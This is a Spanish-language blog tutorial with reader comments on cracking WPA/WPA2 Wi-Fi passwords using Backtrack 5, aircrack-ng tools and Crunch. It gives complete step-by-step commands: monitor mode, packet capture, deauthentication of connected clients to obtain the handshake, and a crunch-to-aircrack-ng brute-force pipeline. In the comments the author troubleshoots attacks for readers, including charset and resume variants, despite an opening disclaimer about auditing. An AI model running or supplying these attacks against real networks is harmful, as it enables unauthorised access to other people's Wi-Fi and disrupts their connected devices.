Auditorías Backtrack 5: Crackear claves WPA/WPA2 sin diccionario

Atención: Estos tutoriales tienen como objetivo mostrar las vulnerabilidades de las redes wifi, para que se creen contraseñas más seguras, en ningún momento se quiere incitar a obtener claves de puntos wi-fi de los que no se es propietario. Lo que los usuarios decidan hacer tras leer este tutorial es por su propia voluntad, si utilizas estos tutoriales para obtener claves ilegalmente, lo haces bajo tu propia responsabilidad.

Os recomiendo ver los tutoriales anteriores ya que así entenderéis mi terminología.

Auditorías Backtrack 5: Instalar.

Auditorías Backtrack 5: Crackear claves WEP.

Auditorías Backtrack 5: Crackear claves WPA/WPA2.

En el último tutorial os explicaba como crackear claves WPA y WPA2 utilizando diccionarios. Haz click aquí si quieres verlo. Os decía que el uso de diccionarios para obtener las contraseñas por fuerza bruta era un poco pesado ya que era bastante improbable tener la palabra y que la mayoría de las claves tienen sólo números.

Bien, para evitar tener que descargar pesados diccionarios os enseñaré como crackear claves WPA y WPA2 sin utilizar diccionarios, para ello utilizaremos Crunch. Primero aprenderemos a instalar el Crunch y posteriormente, partiremos del anterior tutorial y unicamente cambiaremos el último paso para no tener que usar diccionarios, si no usar Crunch.

Primero instalaremos Crunch, de la forma más sencilla que he encontrado ya que hay veces que la cosa se complica. Se puede instalar tanto en Backtrack como en la mayoría de distribuciones yo os lo explicaré para Backtrack partiendo de que lo tenéis funcionando. Si no sabéis instalarlo haced click aquí.

Primero descargaremos Crunch (click aquí para descargar).

Después vamos a la carpeta donde se ha descargado y hacemos click derecho y abrir en un terminal. Cuando se abra el terminal teclearemos:

tar -xvzf crunch-3.3.tgz

Entramos en el directorio donde se acaba de descomprimir escribiendo:

cd crunch-3.3

Vamos a la carpeta y abrimos el archivo MakeFile para donde pone:

val:    crunch.c @echo “Building valgrind compatible binary…”
$(CC) $(VCFLAGS) $(LFS) $? -o crunch

Cambiar la última línea por:

 $(CC) $? $(VCFLAGS) $(LFS) -o crunch

Y en donde pone:

crunch: crunch.c 
@echo “Building binary…” 
$(CC) $(CFLAGS) $(LFS) $? -o $@

Cambiar la última línea por:

$(CC) $? $(CFLAGS) $(LFS) -o $@

Guardamos y nuevamente en el terminal escribiremos:

make install

Para copiarlo en el sbin haciendo así:

cp crunch /usr/sbin/

Ya tenemos el Crunch instalado y ahora copiaré y pegaré el tutorial anterior que también lo podéis ver haciendo click aquí.

Para empezar lo que tenemos que hacer es abrir un nuevo terminal e iniciar el modo monitor de nuestra tarjeta de red. Para ello escribiremos:

airmon-ng start (interface que queremos poner en modo monitor)

Una vez echo esto, procederemos a analizar las redes wifi, escrimibos:

airodump-ng (interface que hemos puesto en modo monitor)

Ahora elegimos la red wifi y procedemos a copiar su dirección mac. Una vez echo esto pararemos el proceso (ctrl+c) y escribiremos:

airodump-ng -w (nombre que le queremos poner al archivo) -c (canal que utiliza la red) --bssid (mac de la red que estamos atacando) y por último añadiremos la interface que estamos usando.

Ahora estamos escaneando la red, hasta aquí ha sido igual que para las claves wep, a partir de ahora cambia. Primero necesitaremos capturar el Handshake, que es un archivo que manda el ordenador con la contraseña al router para que este acepte la conexión. Podemos esperar a que un cliente se conecte, o si no, si hay algún cliente conectado, procederemos a su desautentificación para que se desconecte y al volverse a conectar capturemos su Handshake. Para ello, sin cerrar esa terminal, en una nueva teclearemos:

aireplay-ng -0 00 (00 es el numero de veces que queremos que se intente desautentificar, con 50 suele llegar) -a (mac del router) -c (mac del cliente que está conectado, aparece justo debajo de donde pone station) (interface que estamos usando).

Probablemente después de eso en la primera pantalla en la parte de arriba cuando el cliente se vuelva a conectar aparecerá: WPA handshake: (mac de la red que atamos). Si no es así repetiremos el paso anterior y aumentaremos el número de veces que mandamos la desautentificación.

Como veis todo es lo mismo que en el paso anterior excepto este último que en vez de usar el diccionario escribiremos:

crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -

Donde: 8 9 es el número de cifras que tiene la contraseña y 0123456789 son las cifras que tiene que probar. Tendréis que cambiar los huecos en mayúsculas por vuestros datos.

Espero que os sirva y que esté bien entendido. Recomiendo leer los otros tutoriales para entender a la perfección todo el proceso:

Auditorías Backtrack 5: Instalar.

Auditorías Backtrack 5: Crackear claves WEP.

Auditorías Backtrack 5: Crackear claves WPA/WPA2.

Si tenéis alguna duda no dudéis en dejar un comentario, se os responderá lo antes posible.

Categoría(s): Tutoriales
Tags: , , , , , , ,

125 Respuestas en Auditorías Backtrack 5: Crackear claves WPA/WPA2 sin diccionario

  1. Buen dia amigo, he estado siguiendo tus tutoriales que estan muy bien explicados! Gracias! Ahora yo instale bactrack en una usb, y cada vez que saque el pass de mi modem (Que ya cambie por cierto jaja) al volver a iniciar notaba que los archivos .cap por ej, ya no quedaban guardados.. si yo intalo crunch se quedara en mi usb siempre? (o tendre que intalarlo cada vez que lo inicie! Esa es la unica duda! Muchas gracias Saludos

    • Me alegro de que esa sea la única duda. Efectivamente, si instalas Crunch lo tendrás que hacer todas las veces. Lo que tienes que hacer es volver a poner BackTrack en el Usb y fijarte en el programa que en algún sitio tiene que poner tamaño de la persistencia. Pones el máximo que tu Usb permita y así tendrás el Crunch siempre, al igual que los archivos. El Usb será como un disco duro de bolsillo.
      Saludos!

      • Grácias por tu respuesta y si le di a todo lo de persistencia pero pues mi memoria es de 4 gb y el backtrack 5 r3 me abarca 3.3 gb!! (creo que usare una de 8gb ya) yo creo que mañana estaré probando se los 500mb que asigne para la persistencia! Saludos y muchas gracias por todo! :)

      • Con una de 8 debería funcionar a la perfección! Mucha suerte!
        Saludos! :)

      • Amigo estoy siguiendo los pasos y hay algunas cosas que aclarar, ya que al descomprimir el archivo la carpeta se llama crunch-3.3 por lo que el comando para entrar a la carpeta desde terminal seria cd crunch-3.3 (faltaba el guión o pes cambiar el nombre del archivo jaja)
        Ademas de que para instalar no es doble (make make) si no solo make install :)
        Otra cosa, al menos conmigo al
        Cambiar las ultimas líneas la de val al final no aparece como en tu tutorial pero poniendo lo que dices parece
        No haber problemas! Saludos

      • hola disculpa tengo problemas con la ruta para crakear en crunch pongo:crunch 8 9 0123456789 l aircrack-ng -a 2 miarchivo.cap -e default -b handshake -w – y me amnda: crunch now will generate the following amount of data
        open failed no such file or directory
        quitinfg aircrack ..
        10900000 bytes
        10GB
        que significa el -e default ?

      • Olvidé aclarar pongo-a 2 miarchivo.cap
        porque miarchivo está en carpeta root y lo unico que no hice es modificar el archivo crunch.c y lo de [FLAGS]pero se instaló el crunch en mi pc

      • El guión final es un guión normal. ¿Estas seguro de que el archivo lo encuentra? Es decir que está en el sitio que tu crees y que es accesible. Lo mejor es que escribas aquí tal y como pones todo, si quieres que no se vea tu mac, puedes borrar algunos números.

        -e default significa que use el ESSID por defecto para esa mac.

      • Hola Carlol,esto es lo que pongo y estoy seguro que mi archivo *.cap esta en carpeta root pues con aircrack-ng me trabaja (aunque no saque la clave) pero usando crunch:
        root@bt:~/crunch-3.4# crunch 8 9 0123456789 | aircrack-ng -a 2 wpa75-01.cap -e default -b 68:A3:04:5D:9D:2D -w –
        Opening wpa75-01.cap
        open failed: No such file or directory
        Crunch will now generate the following amount of data: Opening redb-01.cap
        open failed: No such file or directory
        chequé lo del guion y nada

      • No hace falta que esté en la carpeta del crunch, pero dudo mucho que el problema sea ese. La verdad no se cual puede ser, yo usé el crunch 3.3 tal vez sea eso. Es muy raro, puedes probar a poner / antes del nombre del archivo.
        Si no funciona, prueba a ver si con esto: ./crunch 8 9 0123456789 | ./aircrack-ng -a 2 wpa75-01.cap -e default -b 68:A3:04:5D:9D:2D -w –
        O después de -e poner el nombre de la ESSID en vez de poner “default”.

        Espero que te sirva alguna. Saludos!

  2. Hola Socio Saves que estuve siguiedo tu tutorial y tengo una pregunta
    ¿es necesario tener blacktrack 5 instalado? o lo puedo correr de un CD, y lo otro quise instalar el crunch en windows 7 pero al escribir el “tar” (claro sin la comillas) me dice que tar no se reconose….

    eso espero que me ayudes la verdad estoy un poco desesperado ya que lo e intentado artas veses y no me resulta (me estoy frustrado xD) eso desde ya muchas graciias :D

    • Si, desde un CD te funcionará pero no podrás guardar archivos y si quieres instalar el Crunch lo tendrás que hacer cada vez que lo arranques.
      El crunch es para el BackTrack, no tengo conocimiento si funciona sobre Windows 7 pero lo dudo.
      Saludos! :)

  3. Hola, estoy siguiendo tus tutoriales y son muy buenos. He podido con las claves web, pero ni si.quiera con estete tutorial he podido.con la wpa…
    El primer problema es que no puedo instalar el Crunch, le doy dos vecces y se me crea una carpeta con unos ficheros y el segundo es cuando no.hay cliente conectado, en lo de “aireplay-ng -0 50 -a xxxxxx -c.. En el “c” que numeros pongo? Ah si, con crunch funciona si hay letras en la contraseña? Un saludo

    • Hola!
      Para instalar Crunch no tienes que hacer doble click en el archivo descargado, como pone en el tutorial, tienes que:
      Después vamos a la carpeta donde se ha descargado y hacemos click derecho y abrir en un terminal. Cuando se abra el terminal teclearemos:

      tar -xvzf crunch-3.3.tgz
      Entramos en el directorio donde se acaba de descomprimir escribiendo:

      cd crunch-3.3
      Vamos a la carpeta y abrimos el archivo MakeFile para donde pone:

      val: crunch.c @echo “Building valgrind compatible binary…”
      $(CC) $(VCFLAGS) $(LFS) $? -o crunch
      Cambiar la última línea por:

      $(CC) $? $(VCFLAGS) $(LFS) -o crunch
      Y en donde pone:

      crunch: crunch.c
      @echo “Building binary…”
      $(CC) $(CFLAGS) $(LFS) $? -o $@
      Cambiar la última línea por:

      $(CC) $? $(CFLAGS) $(LFS) -o $@
      Guardamos y nuevamente en el terminal escribiremos:

      make install
      Para copiarlo en el sbin haciendo así:

      cp crunch /usr/sbin/

      Y en donde pone -c lo que tienes que poner es la mac del cliente conectado, no tiene por que haber siempre un cliente conectado, tal vez no te aparezca nada.
      Saludos! :)

      • Gracias por responder. Pero es que le doy el click derecho no me aparece la opcion de abrirlo con el terminal y entonces pongo “tar -xvzf nombredelarchivo.tgz” y me sale error que no se puede descomprimirlo… Y le doy doble click se me crea un nuevo .tgz y en el dentro.esta los archivos del Crunch… He mirado de arrastrar el .tgz al terminal y tampoco…

        O sea que sin cliente no se puede ceackearlo no?

        saludos!:))

      • El click derecho no lo tienes que hacer en la carpeta si no sobre el fondo blanco de la carpeta en donde se descarga.
        No, sin cliente no puedes crackear, tienes que esperar a que uno se conecte.
        Saludos! =)

  4. Hola tengo un problema y no se como solucionarlo, segui tu post al pie de la letra pero al ejecutar wepcrackgui me aparece el siguiente mensage:

    01:59:51 p.m.:Warning:Crunch is not installed!
    WPA cracking with crunch will be disabled!
    Please set the correct path to crunch in the options dialog.
    You can download and install crunch from here: http://sourceforge.net/projects/crunch-wordlist/

    Bueno pues bajo el programa le hago las modificaciones del post, abro una terminal corro el comando make install y me aparece:

    hannival@hannival-MPC:~$ cd Descargas/crunch-3.3
    hannival@hannival-MPC:~/Descargas/crunch-3.3$ make install
    Building binary…
    /usr/bin/gcc -pthread -Wall -pedantic -lm -std=c99 -m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 crunch.c -o crunch
    crunch.c: En la función ‘PrintPercentage’:
    crunch.c:1387:20: aviso: se define la variable ‘finall’ pero no se usa [-Wunused-but-set-variable]
    crunch.c: En la función ‘renamefile’:
    crunch.c:1430:12: aviso: se define la variable ‘pidret’ pero no se usa [-Wunused-but-set-variable]
    crunch.c: En la función ‘main’:
    crunch.c:2348:8: aviso: se define la variable ‘loaded’ pero no se usa [-Wunused-but-set-variable]
    /tmp/ccbo3a5q.o: In function `count_strings':
    crunch.c:(.text+0x2205): undefined reference to `pow’
    crunch.c:(.text+0x257b): undefined reference to `pow’
    crunch.c:(.text+0x294b): undefined reference to `pow’
    collect2: ld devolvió el estado de salida 1
    make: *** [crunch] Error 1
    hannival@hannival-MPC:~/Descargas/crunch-3.3$

    Ya he buscado ayuda por todas partes y nada, hechame la mano porfavor.

  5. Excelentes tutoriales mi amigo :)
    Tengo unas duda en el ultimo paso, en el que usamos el crunch y el aircrack
    en “… -b HANDSHAKE ..” HANDSHAKE es la mac del modem que atacamos???

    y por ultimo para que crunch ocupe tambien letras y pruebe con contraseñas de 13 caracteres es valido

    crunch 8 13 0123456789abcdefghijklmnopqrstuvwxyz

    Muchas gracias por tus respuestas

    Saludos.

    • En efecto, el handshake es la mac del router que atacamos, después de donde pone que el handshake lo pone.
      Y si, con el crunch para que use letras también y que sea de 13 caracteres es así. Yo no lo he probado y tampoco lo recomiendo a no ser que tengas un muy buen ordenador, ya que si no tardará una exageración.
      Saludos! ;)

  6. Hola, oye una duda que espero me puedas responder, crunch solamente acepta numeros tambien letras y numeros combinadas, letras solamente o como funciona? Alguna otra herramienta mas potente que pueda usar pero sin usar un diccionario,.
    Espero que puedas ayudarme, gracias por tu tutorial esta excelente.

    • Puedes añadir lo que quieras,
      crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -
      los números en negrita, son los que prueba, ahí puedes poner tanto letras, como números, como símbolos, eso si, cuanto más añadas, más tarda.
      Respecto a una herramienta más potente, no se decirte, crunch es una herramienta muy potente.
      Saludos ;)

    • Saludos, pues dejen decirles que si hay herramienta mas potente que crunch pero es necesario una tarjeta de video y el programa es ocl-Hashcat-plus ; solo que es algo extenso de entender sobretodo si no saben inglés

  7. hola te voy a hacer una pregunta estupida pero ayer consegui una clave wpa-psk con beini .mi duda es como la escribo donde dice escribir clave de red.disculpa mi ignorancia gracias

  8. Hola, gracias por compartir estos tutoriales de toda la Web puedo decir que es el mejor y más claro con el que me he topado.
    Te comparto mi duda, si voy a correr el Backtrack dsd CD live, donde instalo el Crunch? sobre windows? Espero tus comentarios.
    Gracias de nuevo.
    Saludos

    • Si lo corres sobre un Live CD sería necesario instalar crunch cada vez que lo quisieses usar, te recomiendo que hagas un Live USB con una parte de permanencia para usarlo como si fuese otro disco duro aparte.

      Saludos ;)

      • Bien, utilizare entonces un live USB y dentro de dicha USB copio los archivos del Crunch supongo.
        Gracias por responder,
        Saludos
        K

  9. Ya tengo mi USB Live con Bactrack 5. Mi duda es porque desde donde utilizare mi Backtrack no tengo acceso a Internet asi que ya quiero llevar instalado o copiado el Crunch.
    Ya tengo mi usb live con bactrack
    En mi Lap con Windows ya tengo la descarga de crunch 3.3 ahora mi pregunta es ¿donde copio el archivo descargado de internet de crunch 3.3 exactamente? Sobre carpeta raiz de mi usb? o en alguna carpeta del Virtual Box de usb live?
    Gracias de nueva cuenta.
    Saludos,

    • Si ya lo tienes descargado en tu ordenador, arrancas a través de Backtrack y montas tu disco duro de Windows a través de la carpeta “/media”, una vez ahí, puedes buscar el archivo y lo instalas siguiendo las instrucciones. Si no, arrastrándolo a la carpeta raíz del USB también te vale.
      Sobre por que no tienes internet en Backtrack es simplemente porque el cliente de conexión por Wifi (supongo que usaras Wifi) no arranca al inicio del sistema, entonces tendrías que buscarlo entre las aplicaciones instaladas, es un poco más complicado conectarse que a través de los gestores Wifi habituales, pero no es imposible.
      Saludos ;)

      • Muchas gracias, pero si cuando arranco Bactrack si me detecta redes a lo que me refería es que en la zona donde mas tarde utilizare mi backtrack no tengo acceso a internet aunque si detecta redes a su alcance ;)
        Gracias.
        Saludos,
        K

  10. hola muy buenos tutoriales! tengo una duda, ya instale el crunch y todo ahora estoy capturando paquetes pero no logro el handshake ya que no hay cliente conectado, yo siento que el cliente si esta conectado, pero no es por wifi! si no por el cable de ethernet! el cliente tiene que estar conectado por wifi verdad? o no tiene nada que ver?

  11. Hola tengo una duda sobre crunch, se puede empezar a partir de cierto numero por ejemplo si al utilizarlo
    crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w –
    mientras trataba de encontrar la clave pare el escaneo por error y se qedo en:
    09364275 , por ejemplo
    existe la manera de volver a empezar apartir de ese numero
    que no empieze asi:
    00000001
    00000002
    00000003
    sino desde numero q se qedo:
    09364275
    09364276
    093642757
    093642758
    se puede hacer eso y si existe podrian decirme como ???

    • Si puedes, tienes que añadir antes de la opción -a, la opción -s y el número en el que quieras que siga. Por lo tanto en tu caso te quedaría así:

      crunch 8 9 0123456789 | aircrack-ng -s 09364275 -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w –

      Aquí te dejo un enlace a un foro con un poquito de documentación.

      Saludos ;)

  12. Disculpa por esta pregunta tonta, pero siempre eh hecho las cosas con diccionario pero como es eso o como funciona con “crunch” Gracias

    • Simplemente genera una palabra, refiriéndose a palabra con contraseña se la pasa al aircrack, este la prueba y después la borra. No se si es a eso a lo que te referías.

      Saludos =)

    Rodney-01.cap dijo:

    Me a ayudado mucho esto, pero, cuando escribo

    crunch 8 9 0123456789 | aircrack-ng -a 2 /root/wpa-o1.cap -e default -b handshake -w –

    me dice:
    opening /root/wpa-01.cap

    No valid WPA handshake found..

    Quitting aircrack-ng
    crunch: command not found

    explicame porque me dice no valid handshake y lo de command not found del crunch porfavor :c

    Gracias…

    • crunch 8 9 0123456789 | aircrack-ng -a 2 /root/wpa-o1.cap -e default -b handshake -w –

      Donde te marco el handshake en negrita, no tienes que poner handshake tienes que poner la MAC del router que atacas.

      Lo de crunch command not found quiere decir que no instalaste bien el crunch.

      Saludos =)

  13. Amigo, tengo un error en el ultimo paso y es este, haber si me puedes explicar que pasa:

    crunch 8 9 0123456789 | aircrack-ng -a 2 /root/wifi-01.cap -e default 00:25:68:04:1A:40 -w –
    Opening /root/wifi-01.cap
    Crunch will now generate the following amount of data: 10900000000 bytes
    10395 MB
    10 GB
    0 TB
    0 PB
    Crunch will now generate the following number of lines: 1100000000
    Opening 00:25:68:04:1A:40
    open failed: No such file or directory
    Opening /root/wifi-01.capait…
    Opening 00:25:68:04:1A:40
    open failed: No such file or directory

    Quitting aircrack-ng…

    PD. llame wifi al paquete

    • Te falta la opción “-b” antes del handshake, es decir tienes que poner esto:
      crunch 8 9 0123456789 | aircrack-ng -a 2 /root/wifi-01.cap -e default -b 00:25:68:04:1A:40 -w –

      Saludos =)

      • Oye y si la wpa2 de mi router tiene espacios? como debo de ponerle. Mi clave es “DORA LA EXPLORADORA” y coloque estos comandos:

        root@bt:~# crunch 8 19 abcdefghijklmnopqrstuvwxyz | aircrack-ng -a 2 /root/wifi-01.cap -e default -b 00:25:68:04:1A:40 -w –
        Opening /root/wifi-01.cap
        Crunch will now generate the following amount of data: 17575625734121040128 bytes
        16761422857399 MB
        16368577009 GB
        15984938 TB
        15610 PB
        Crunch will now generate the following number of lines: 2580398979778803456
        Reading packets, please wait…

        No se si se pueda porfa

      • Si que se puede poner espacio, pero al ser “DORA LA EXPLORADORA” en mayúsculas, con lo que pones no funcionaría, puedes mirar esto: http://www.miralapantalla.com/documentacion-sobre-crunch/ y tienes que poner:
        crunch 8 19 ualpha-space| aircrack-ng -a 2 /root/wifi-01.cap -e default -b 00:25:68:04:1A:40 -w –

        saludos =)

  14. una pregunta porque al auditar con backtrack me aparecen varias redes y al ver las redes inalambricas en windows solo me aparecen 4 o 5 y en back track 8 a 13 y que equipo seria recomendado ya que cuento con airtux 2000w

    • Eso pasa porque al auditar muestra todas las redes que detecta, a las que es posible conectarse y a las que no ya que si no tienen suficiente potencia la conexión no sería posible aunque se detecten, al ver las redes con windows solo te muestra las que están por encima de una potencia, con las que sería posible establecer una conexión.
      La antena que tienes yo creo que está bien.

      Saludos!

  15. Disculpa las molestias. Quisiera emular la imagen iso del bactrack pero desde VirtualBox, pero lo que no se es como agregarle el crunch al bactrack desde virtualbox, tengo windows 7 pero no se donde debo colocar el crunch para compartilo dentro del Bactrack en VirtualBox.

    Saludos.

  16. Hola, quisiera emular la imagen iso del bactrack conVirtualBox ,pero lo que no se es como compartir el archivo crunch desde mi pc que tiene windows 7 .
    Que debo hacer para que despues de iniciado la emularcion del bactrack en virtualbox pueda abrir el crunch.

    Saludos.

    • No tienes por que dejar tantos comentarios seguidos (3 comentarios en 12 minutos), no te voy a contestar antes por ello, miro los comentarios cuando puedo y contesto lo mejor posible, por lo tanto busco información para poder dar mejores respuestas (lo que me lleva tiempo).
      Cuando pones a correr el Backtrack lo que tienes que hacer es enchufar un pendrive con el archivo del crunch y en la parte de abajo seleccionar donde pone dispositivos USB para que los lea el VirtualBox en vez del sistema anfitrión.

      Saludos :)

      • Disculpame por favor, es que se congelo un rato mi pc, pense que no se habia mandado mi mensaje por eso te lo volvi a enviar, no quize en ningun momento molestar con tantos mensajes. Disculpa y Saludos.

      • Disculpa, cuando el makefile esta intsalado de debe salir:”
        make : ´make install’ is up to date.

        Asi me sale cuando le pongo make install

  17. olleme carol gracias primero por tus grandes tutoriales pero tengo una duda: ya intale el crunh correctamente pero cuando lanzo el aireplay-ng -0 00 no me aparece el wpa handshake por mas veses que le aumente el numero de veces y tambien intento cambiar de cliente y nada te agradesco si me ayudas

    • Tienes que cambiar el 00 por un número que te parezca bueno para mandar desautentificaciones, por ejemplo entre 50 y 100 y si no lo aumentas un poco más e ir probando con los diferentes clientes que haya en la red.

      Saludos!

  18. Hola Carlol, ante todo gracias por todos tus buenos tutoriales, quisiera saber si todo este tutorial puede funcionar con Backtrack 4?
    Saludos.

  19. Disculpa como saco este signo en backtrack crunch” | ”

    para poder ponerlo despues 0123456789

    crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w –
    Saludos.

    • En mi teclado que está en español tengo que presionar el “Alt Gr” (el de la derecha) y el 1 de la fila de arriba. Creo que en el teclado inglés es igual en el resto ya no te se decir.

      Saludos!

  20. carlol que es toda esa numerologia al final de el proceso sera que me sirve para juagar el valoto no mentira por que sale todos esos numeros

  21. Cârlol, maravillosa estrategia, así se evita guardar enormes diccionarios que conllevan a ocupar gran espacio.
    Estoy adentrándome en este mundo, he leído resto y he consultado muchos vídeos, así como he generado diccionarios grandes, pero esta forma de no utilizar un diccionario creado me pareció una maravilla.
    Felicitaciones por el logro y por compartirlo.
    Felicitaciones por su enorme paciencia y gracias por responder a tantas personas que tienen dudas y que al igual que yo estamos en proceso continuo de aprendizaje.
    Estoy en ese proceso, llevo 35 minutos (aun nada) y como dijo carlos en su apunte… seguiré buscando un numero pal’ Baloto en esa numerologia al final. :)

    Saludos cordiales…
    Orkonet

  22. Hola Cârlol. Antes que nada darte las gracias por compartir tu información y ayudarnos con este tema que nos lleva de cabeza, y más para alguien como yo, un poquito negado pero poco a poco voy aprendiendo más gracias a gente como tu. Te quería preguntar como pasar crunch una vez descargado al pendrive o incluirlo al backtrack, porque lo que hay que poner por ahora lo entiendo, pero le doy al botón derecho a la carpeta que se a descargado sin descomprimir y me sale lo típico, extraer archivos, abrir con…, analizar, etc… Pero como le habro un terminal para teclear todo eso? Necesito algún programa en concreto? O tiene que ser desde backtrack directamente? Yo lo tengo en la carpeta abitual de descargas, una vez escrito eso y modificado, directamente se copia en el pen o como lo tengo que hacer para que se pase? Porque luego una vez pasado e insatalado correctamente lo utilizo a través de blacktrack una vez tenga el handshake verdad?
    Gracias de antemano Cârlol y perdona si las preguntas son de muy novato pero llevo poquito con este mundo de la informática en profundo.
    Mil gracias un abrazo y espero tu respuesta y haber si lo consigo.

    • Tienes que tener el BackTrack instalado en algún sitio, no puedes copiar la carpeta al pen. Puedes instalar el backtrack en el pen con un espacio para persistencia entonces se mantiene el crunch instalado.

      Saludos!

  23. Hola.
    Me he descargado crunch.
    Lo tengo en una carpeta en el escritorio del Backtrack 5 r3, tanto si clico con el boton derecho sobre el icono o sobre la parte blanca, no me sale ninguna opcion de abrir en un terminal y no puedo ni siquiera comenzar con el tutorial.

    gracias

    • Puedes acceder mediante terminal. Mediante el comando “dir” puedes ver que carpetas hay dentro de donde estás y después con el comando “cd” vas accediendo a cada una de ellas (“cd ..” sirve para ir a la carpeta anterior).

      Si dices que lo tienes en el escritorio con poner “cd /home/NOMBRE_USUARIO/Desktop/NOMBRE_CARPETA_CRUNCH” deberías conseguir llegar. El nombre de usuario suele ser root, por lo tanto: “cd /home/root/Desktop/NOMBRE_CARPETA”.

      Espero que lo consigas. Saludos!

      • esto es lo que he hecho desde el terminal
        cd/home/root/Desktop/fol

        la carpeta está en el escritorio y se llama fol. dentro de ésta está el archivo crunch-3.3.tgz.exe y todo ello con el BACKTRACK 5 R3 pero sigo igual…
        ¿Alguna sugerencia?

        gracias

      • No haces bien la descarga, el archivo no es “crunch-3.3.tgz.exe” cuando ponga lo de descargar tienes que hacer click en “click here”.

        La carpeta así debería entrar, necesitas un espacio después de “cd” Por lo tanto quedaría “cd /home/root/Desktop/fol”.

        Saludos!

  24. Lo descargo donde dics,, en ‘click here’ y el archivo que sale es
    crunch-3.3.tgz.exe ¿ hay otro archivo que no sea ese?.

    gracias

    • Lo he resubido, puedes descargarlo aquí:
      http://db.tt/sXflhAeR

      saludos

      • muchas gracias por tu ayuda.
        a ver si ahora puedo con ello.

        saludos

      • Hola Cârlol, después de varias semanas sin resultados en mi intento para seguir tu tutorial no he conseguido nada. Me pregunto si el problema puede ser que mi tarjeta de red no sirve para esto.
        La tarjeta es la siguiente:

        eth0 Link encap:Ethernet HWaddr 00:18:f3:2f:57:a0
        UP BROADCAST MULTICAST MTU:1500 Metric:1
        RX packets:0 errors:0 dropped:0 overruns:0 frame:0
        TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1000
        RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
        Interrupt:44 Base address:0xa000

        lo Link encap:Local Loopback
        inet addr:127.0.0.1 Mask:255.0.0.0
        inet6 addr: ::1/128 Scope:Host
        UP LOOPBACK RUNNING MTU:16436 Metric:1
        RX packets:14 errors:0 dropped:0 overruns:0 frame:0
        TX packets:14 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:0
        RX bytes:889 (889.0 B) TX bytes:889 (889.0 B)

        wlan0 Link encap:Ethernet HWaddr 00:13:02:ef:83:63
        UP BROADCAST MULTICAST MTU:1500 Metric:1
        RX packets:0 errors:0 dropped:0 overruns:0 frame:0
        TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1000
        RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

        tengo este otro archivo para comenzar con él pero no sé, como te digo, si vale esta tarjeta.

        crunch-3.3.tar

        Muchas gracias

      • La verdad no conozco todas las tarjetas admitidas por backtrack. Pero tampoco puedo identificar tu problema. ¿Que es lo primero que haces? ¿Que error da eso? ¿Abres backtrack bien?

        Saludos!

  25. La carpeta crunch-3.3.tar la tengo en el escritorio del backtrack5r y al hacer clic sobre él con el botón dicho. las opciones que me da son
    -Open with archive mounter
    -Open with other application
    -Cut
    -Copy
    -Make Link
    -Renane…
    -Copy to
    -Move to
    -Move to trash
    -Resize icon
    -Properties

    No veo donde pone ‘abrir en un terminal’

    La otra forma que he intentado es teniendo el archivo crunch-3.3.tar en una carpeta llamada fol en es escritorio, hago clic con el botón dcho. en el archivo o en el área blanca y lo mismo y la tercera opción que he intentado con la carpeta en el escritorio es abrir un terminal y escribir
    cd /home/root/Desktop/fol y me dice No such file or directory.

    Gracias.

    • A ver, ¿ya tienes la carpeta extraída o no? Lo que tienes que hacer es descargar el archivo en la carpeta download, una vez ahí pinchando sobre el área en blanco de la carpeta download aparecerá lo de “abrir en un teminal” Si no es así lo que puedes hacer es como probaste con “cd /home/root/Downloads (o como sea)” y podrás seguir todos los pasos. Si no funciona así miraremos otra vez.

      Saludos!

  26. Hola Cârlol, vuelvo al muro. Te escribí respondiendo al email directamente. Te decía que no conseguía empezar el tutorial. He hecho lo siguiente pero nada…sigo igual.

    Estas dos entradas no dan resultado. No sé si lo hago bien

    root@bt:~# cd /home/root/Desktop/fol
    bash: cd: /home/root/Desktop/fol: No such file or directory
    root@bt:~# tar -xvzf crunch-3.3.tgz
    tar: crunch-3.3.tgz: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Exiting with failure status due to previous errors

    Si hago clic con el boton deredcho sobre el archivo crunch-3.3.tgz no aparece extraer aquí, si no:

    -Open with archive mounter
    -open with other application
    -Cut
    -Copy
    -Make link
    -Rename
    -Copy to
    -Move to
    -Move to trash
    -Properties

    Gracias de nuevo.

    • Es muy raro. Puedes intentar acceder al escritorio carpeta por carpeta en vez de poner la dirección entera a ver si funciona. Es decir:

      cd / (así accedes al directorio raíz)
      ls (miras que carpetas hay en ese directorio)
      cd home (así accedes a la carpeta home)
      ls (miras que carpetas hay en ese directorio)
      cd root (accedes a la carpeta de root)
      cd Desktop (accedes a la carpeta del escritorio)
      cd fol (accedes a esa carpeta que tienes en tu escritorio)

      Si quieres ir a la carpeta anterior podrás escribir “cd ..” así no tendrás que volver a empezar si te confundes.
      Una vez que estés en la carpeta fol, escribes lo de “-xvzf crunch-3.3.tgz”

      Espero que funcione de una vez por todas. Saludos! :)

  27. Hola Cârlol ahora me pasa esto:

    root@bt:~# cd Desktop
    root@bt:~/Desktop# cd fol
    root@bt:~/Desktop/fol# tar -xvzf crunch-3.3.tgz
    tar: crunch-3.3.tgz: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Exiting with failure status due to previous errors
    root@bt:~/Desktop/fol#

    Gracias.

  28. te quería preguntar si cuando capturados el handshake detengo el escaneo lo dejó que siga corriendo a y otra cosa por lo general cuanto se demora en soltar la contraseña me quedado por casi 4 horas y nada de nada en el último proceso

  29. Estoy en busca de saber cuanto tiempo se demora en capturar una contraseña y que cuando capturó el handschake detengo el escaneo o lo dejó que siga corriendo antes de lanzar el aircrack te agradezco si me respondes carlol

